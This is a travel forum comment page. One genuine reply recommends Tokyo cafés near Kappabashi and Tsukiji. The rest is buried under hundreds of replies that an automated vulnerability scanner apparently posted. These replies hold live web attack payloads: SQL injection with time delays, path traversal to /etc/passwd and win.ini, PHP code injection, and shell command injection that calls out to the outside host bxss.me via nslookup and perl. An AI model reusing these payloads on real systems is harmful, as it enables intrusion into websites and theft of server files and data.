\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140342

re: Yee How

WEB-INF/web.xml

1727140343

re: Yee How

WEB-INF\web.xml

1727140343

re: Yee How

1

1727140852

re: Yee How

1

1727140863

re: Yee How

-1 OR 2+93-93-1=0+0+0+1 --

1727140863

re: Yee How

-1 OR 3+93-93-1=0+0+0+1 --

1727140863

re: Yee How

-1 OR 2+630-630-1=0+0+0+1

1727140864

re: Yee How

-1 OR 3+630-630-1=0+0+0+1

1727140864

re: Yee How

-1' OR 2+279-279-1=0+0+0+1 --

1727140864

re: Yee How

-1' OR 3+279-279-1=0+0+0+1 --

1727140865

re: Yee How

-1' OR 2+61-61-1=0+0+0+1 or 'uAABXuFB'='

1727140865

re: Yee How

-1' OR 3+61-61-1=0+0+0+1 or 'uAABXuFB'='

1727140866

re: Yee How

-1" OR 2+149-149-1=0+0+0+1 --

1727140866

re: Yee How

-1" OR 3+149-149-1=0+0+0+1 --

1727140866

re: Yee How

if(now()=sysdate(),sleep(15),0)

1727140875

re: Yee How

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140885

re: Yee How

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140893

re: Yee How

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140903

re: Yee How

-1; waitfor delay '0:0:15' --

1727140912

re: Yee How

-1); waitfor delay '0:0:15' --

1727140922

re: Yee How

1 waitfor delay '0:0:15' --

1727140931

re: Yee How

RyTzJ6Vy'; waitfor delay '0:0:15' --

1727140940

re: Yee How

-5 OR 876=(SELECT 876 FROM PG_SLEEP(15))--

1727140949

re: Yee How

-5) OR 418=(SELECT 418 FROM PG_SLEEP(15))--

1727140960

re: Yee How

-1)) OR 20=(SELECT 20 FROM PG_SLEEP(15))--

1727140971

re: Yee How

POq8roqj' OR 223=(SELECT 223 FROM PG_SLEEP(15))--

1727140981

re: Yee How

TY7ODtzf') OR 128=(SELECT 128 FROM PG_SLEEP(15))--

1727140993

re: Yee How

uC99EWQ8')) OR 24=(SELECT 24 FROM PG_SLEEP(15))--

1727141006

re: Yee How

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141019

re: Yee How

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141031

re: Yee How

'||(select 1 from (select pg_sleep(15))x)||'

1727141047

re: Yee How

''||(select 1 from (select pg_sleep(15))x)||''

1727141061

re: Yee How

1'"

1727141062

re: Yee How

@@z5MX8

1727141063

Café sensing touch of earth if you are going for a stroll through kappabashi

Turrets coffee if you are going to tsukiji

1668309841 Reply
Add photos

re: Wanderlusting

7Drx4cCA

1697002521

re: Wanderlusting

1*

1697002522

re: Wanderlusting

1*

1697002522

re: Wanderlusting

1*

1697002522

re: Wanderlusting

1*

1697002522

re: Wanderlusting

-1 OR 2+805-805-1=0+0+0+1

1697002523

re: Wanderlusting

-1 OR 3+805-805-1=0+0+0+1

1697002523

re: Wanderlusting

if(now()=sysdate(),sleep(15),0)

1697002528

re: Wanderlusting

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002532

re: Wanderlusting

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002536

re: Wanderlusting

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002541

re: Wanderlusting

-1; waitfor delay '0:0:15' --

1697002545

re: Wanderlusting

-1); waitfor delay '0:0:15' --

1697002550

re: Wanderlusting

1 waitfor delay '0:0:15' --

1697002556

re: Wanderlusting

GBkZubsx'; waitfor delay '0:0:15' --

1697002560

re: Wanderlusting

-5 OR 585=(SELECT 585 FROM PG_SLEEP(15))--

1697002565

re: Wanderlusting

-5) OR 211=(SELECT 211 FROM PG_SLEEP(15))--

1697002570

re: Wanderlusting

-1)) OR 243=(SELECT 243 FROM PG_SLEEP(15))--

1697002574

re: Wanderlusting

twhTwWY7' OR 207=(SELECT 207 FROM PG_SLEEP(15))--

1697002578

re: Wanderlusting

f7cqIM00') OR 444=(SELECT 444 FROM PG_SLEEP(15))--

1697002583

re: Wanderlusting

RcdrJ6IT')) OR 210=(SELECT 210 FROM PG_SLEEP(15))--

1697002587

re: Wanderlusting


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002590

re: Wanderlusting


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002596

re: Wanderlusting

'||(select 1 from (select pg_sleep(15))x)||'

1697002601

re: Wanderlusting

''||(select 1 from (select pg_sleep(15))x)||''

1697002605

re: Wanderlusting

1'"

1697002605

re: Wanderlusting

@@RT4hX

1697002606

re: Wanderlusting

aQIT4jW6

1697002754

re: Wanderlusting

1*

1697002755

re: Wanderlusting

1*

1697002755

re: Wanderlusting

1*

1697002755

re: Wanderlusting

1*

1697002756

re: Wanderlusting

-1 OR 2+811-811-1=0+0+0+1

1697002756

re: Wanderlusting

-1 OR 3+811-811-1=0+0+0+1

1697002756

re: Wanderlusting

if(now()=sysdate(),sleep(15),0)

1697002760

re: Wanderlusting

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002765

re: Wanderlusting

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002768

re: Wanderlusting

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002772

re: Wanderlusting

-1; waitfor delay '0:0:15' --

1697002776

re: Wanderlusting

-1); waitfor delay '0:0:15' --

1697002780

re: Wanderlusting

1 waitfor delay '0:0:15' --

1697002784

re: Wanderlusting

c2g6IxFL'; waitfor delay '0:0:15' --

1697002788

re: Wanderlusting

-5 OR 802=(SELECT 802 FROM PG_SLEEP(15))--

1697002791

re: Wanderlusting

-5) OR 649=(SELECT 649 FROM PG_SLEEP(15))--

1697002796

re: Wanderlusting

-1)) OR 884=(SELECT 884 FROM PG_SLEEP(15))--

1697002800

re: Wanderlusting

CBEVM9k8' OR 832=(SELECT 832 FROM PG_SLEEP(15))--

1697002803

re: Wanderlusting

ZkN03Y7O') OR 30=(SELECT 30 FROM PG_SLEEP(15))--

1697002808

re: Wanderlusting

DvTN1xGZ')) OR 922=(SELECT 922 FROM PG_SLEEP(15))--

1697002812

re: Wanderlusting


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002816

re: Wanderlusting


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002820

re: Wanderlusting

'||(select 1 from (select pg_sleep(15))x)||'

1697002825

re: Wanderlusting

''||(select 1 from (select pg_sleep(15))x)||''

1697002828

re: Wanderlusting

1'"

1697002829

re: Wanderlusting

@@C7ySK

1697002829

re: Wanderlusting

1yShViKnO

1727140254

re: Wanderlusting

response.write(9697215*9845333)

1727140259

re: Wanderlusting

<esi:include src="http://bxss.me/rpb.png"/>

1727140259

re: Wanderlusting

%0abcc:074625.67-12769.67.d0d0a.19990.2@bxss.me

1727140259

re: Wanderlusting

'+response.write(9697215*9845333)+'

1727140260

re: Wanderlusting

${10000053+10000366}

1727140260

re: Wanderlusting

to@example.com>%0d%0abcc:074625.67-12770.67.d0d0a.19990.2@bxss.me

1727140260

re: Wanderlusting

"+response.write(9697215*9845333)+"

1727140260

re: Wanderlusting

../../../../../../../../../../../../../../etc/passwd

1727140263

re: Wanderlusting

../../../../../../../../../../../../../../windows/win.ini

1727140264

re: Wanderlusting

file:///etc/passwd

1727140265

re: Wanderlusting

'.gethostbyname(lc('hitxt'.'cfyelytga2b44.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(84).chr(117).chr(85).'

1727140266

re: Wanderlusting

../../../../../../../../../../../../../../../proc/version

1727140266

re: Wanderlusting

".gethostbyname(lc("hitrj"."kpwcphskbea14.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(69).chr(105).chr(78)."

1727140267

re: Wanderlusting

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727140267

re: Wanderlusting

)

1727140267

re: Wanderlusting

../../../../../../../../../../etc/passwd%00.jpg

1727140268

re: Wanderlusting

!(()&&!|*|*|

1727140269

re: Wanderlusting

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727140270

re: Wanderlusting

^(#$!@#$)(()))******

1727140270

re: Wanderlusting

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727140271

re: Wanderlusting

1727140272

re: Wanderlusting

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727140272

re: Wanderlusting

bxss.me/t/xss.html?%00

1727140273

re: Wanderlusting

"+"A".concat(70-3).concat(22*4).concat(113).concat(80).concat(108).concat(84)+(require"socket"
Socket.gethostbyname("hitdj"+"vtxyvkxa376f2.bxss.me.")[3].to_s)+"

1727140273

re: Wanderlusting

/etc/passwd

1727140273

re: Wanderlusting

echo ienftt$()\ bmuqtl\nz^xyu||a #' &echo ienftt$()\ bmuqtl\nz^xyu||a #|" &echo ienftt$()\ bmuqtl\nz^xyu||a #

1727140274

re: Wanderlusting

'+'A'.concat(70-3).concat(22*4).concat(116).concat(65).concat(100).concat(80)+(require'socket'
Socket.gethostbyname('hitky'+'dienoryo09dd2.bxss.me.')[3].to_s)+'

1727140274

re: Wanderlusting

%2fetc%2fpasswd

1727140274

re: Wanderlusting

&echo kadmjr$()\ trcztc\nz^xyu||a #' &echo kadmjr$()\ trcztc\nz^xyu||a #|" &echo kadmjr$()\ trcztc\nz^xyu||a #

1727140275

re: Wanderlusting

/.././.././.././.././.././.././.././../etc/./passwd%00

1727140275

re: Wanderlusting

|echo gbyidc$()\ raaoes\nz^xyu||a #' |echo gbyidc$()\ raaoes\nz^xyu||a #|" |echo gbyidc$()\ raaoes\nz^xyu||a #

1727140276

re: Wanderlusting

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727140276

re: Wanderlusting

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727140276

re: Wanderlusting

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727140276

re: Wanderlusting

(nslookup hituzplojduez54578.bxss.me||perl -e "gethostbyname('hituzplojduez54578.bxss.me')")

1727140277

re: Wanderlusting

1727140277

re: Wanderlusting

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727140277

re: Wanderlusting

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727140277

re: Wanderlusting

$(nslookup hithifvgqlzjy55632.bxss.me||perl -e "gethostbyname('hithifvgqlzjy55632.bxss.me')")

1727140278

1727140278

re: Wanderlusting

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727140278

re: Wanderlusting

';print(md5(31337));$a='

1727140278

re: Wanderlusting

'"

1727140278

re: Wanderlusting

&nslookup hitsdxlgmzbnp00859.bxss.me&'\"`0&nslookup hitsdxlgmzbnp00859.bxss.me&`'

1727140278

re: Wanderlusting

/etc/shells

1727140278

re: Wanderlusting

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727140279

re: Wanderlusting

";print(md5(31337));$a="

1727140279

re: Wanderlusting

<!--

1727140279

re: Wanderlusting

&(nslookup hityskcnpcqfz93e22.bxss.me||perl -e "gethostbyname('hityskcnpcqfz93e22.bxss.me')")&'\"`0&(nslookup hityskcnpcqfz93e22.bxss.me||perl -e "gethostbyname('hityskcnpcqfz93e22.bxss.me')")&`'

1727140279

re: Wanderlusting

c:/windows/win.ini

1727140279

re: Wanderlusting

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727140279

re: Wanderlusting

${@print(md5(31337))}

1727140280

re: Wanderlusting

|(nslookup hitfulwappety97792.bxss.me||perl -e "gethostbyname('hitfulwappety97792.bxss.me')")

1727140280

re: Wanderlusting

bxss.me

1727140280

re: Wanderlusting

file:///etc/passwd

1727140280

re: Wanderlusting

${@print(md5(31337))}\

1727140280

re: Wanderlusting

`(nslookup hitjtdkjgxewz90370.bxss.me||perl -e "gethostbyname('hitjtdkjgxewz90370.bxss.me')")`

1727140280

re: Wanderlusting

/\../\../\../\../\../\../\../etc/passwd

1727140281

re: Wanderlusting

'.print(md5(31337)).'

1727140281

re: Wanderlusting

;(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")|(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")&(nslookup hitoruhrdlydzb9047.bxss.me||perl -e "gethostbyname('hitoruhrdlydzb9047.bxss.me')")

1727140281

re: Wanderlusting

/WEB-INF/web.xml

1727140281

re: Wanderlusting

C:\WINDOWS\system32\drivers\etc\hosts

1727140281

re: Wanderlusting

../../../../../../../../../../windows/win.ini%00.jpg

1727140282

re: Wanderlusting

/../../../../../../../../../../boot.ini

1727140282

re: Wanderlusting

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727140283

re: Wanderlusting

..\..\..\..\..\..\..\..\windows\win.ini

1727140283

re: Wanderlusting

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727140285

re: Wanderlusting

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727140288

re: Wanderlusting

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727140290

re: Wanderlusting

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727140291

re: Wanderlusting

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140291

re: Wanderlusting

WEB-INF/web.xml

1727140292

re: Wanderlusting

WEB-INF\web.xml

1727140292

re: Wanderlusting

1

1727140818

re: Wanderlusting

1

1727140831

re: Wanderlusting

-1 OR 2+971-971-1=0+0+0+1 --

1727140832

re: Wanderlusting

-1 OR 3+971-971-1=0+0+0+1 --

1727140832

re: Wanderlusting

-1 OR 2+128-128-1=0+0+0+1

1727140832

re: Wanderlusting

-1 OR 3+128-128-1=0+0+0+1

1727140833

re: Wanderlusting

-1' OR 2+774-774-1=0+0+0+1 --

1727140833

re: Wanderlusting

-1' OR 3+774-774-1=0+0+0+1 --

1727140834

re: Wanderlusting

-1' OR 2+446-446-1=0+0+0+1 or 'lzbqaI4i'='

1727140834

re: Wanderlusting

-1' OR 3+446-446-1=0+0+0+1 or 'lzbqaI4i'='

1727140835

re: Wanderlusting

-1" OR 2+184-184-1=0+0+0+1 --

1727140835

re: Wanderlusting

-1" OR 3+184-184-1=0+0+0+1 --

1727140836

re: Wanderlusting

if(now()=sysdate(),sleep(15),0)

1727140845

re: Wanderlusting

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140854

re: Wanderlusting

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140865

re: Wanderlusting

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140874

re: Wanderlusting

-1; waitfor delay '0:0:15' --

1727140883

